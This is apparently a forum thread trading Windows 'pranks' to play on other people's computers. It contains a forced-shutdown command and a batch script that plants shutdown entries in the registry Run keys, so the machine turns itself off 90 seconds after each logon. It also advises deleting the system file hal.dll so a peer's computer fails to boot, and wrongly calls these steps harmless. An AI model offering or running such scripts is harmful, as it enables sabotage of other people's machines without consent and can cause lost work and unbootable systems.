Just thought I'd add another prank:)

Take a screen-grab of the desktop and then just display it full-screen, using an appropriate image display.  A variation on this is to take a screen-grab of someone else's desktop and display that instead.

If you want to put a bit more effort into the prank, use the screen-grab as a basis for a full-screen PowerPoint presentation.

Nice trick, you could improve it thought by putting into the short cut:

Code: [Select] [nofollow]
shutdown -s -f -t 05 -c "gotcha!"
The "-f" forces programs to shutdown when the timer runs out, an added nasty surprise  :)

Another prank, (albeit most annoying), is to execute the following code...:

Code: [Select] [nofollow]
@echo on
:A
set DSSKEY="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
set DSSKEY="HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
set DSSKEY="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
reg add %DSSKEY% /v Shutdown /t REG_SZ /f /d "shutdown -s -f -t 90 -c byeeeee!"
shutdown -s -f -t 00
exit

This should cause the computer to shutdown after 90 seconds when you've logged on. You can to stop the computer turning off is to just delete the registry values or each time just run "shutdown -a".

If you delete the following "C:\Windows\system32\hal.dll", and it will gaurantee your peer to spend quite a time working out whats gone wrong  ;)Basically, its a system file, or to be more exact, a "dynamically linked library", which mainly get executed by the system. Anyway, this one in particular communicates between the software and the hardware and is crucial to the running of the computer. As with all of the above pranks, it doesn't do any damage to files on your computer (with the exception of itself). You can use the microsoft system recovery disk to get your computer up and running again after that, or just boot off another HD and copy it accross to the HD that is missing hal.dll

You can also get a few great programs from freewarehome.com.

All the above "pranks" are only compatible with windows, and i do not condone anything you do with them
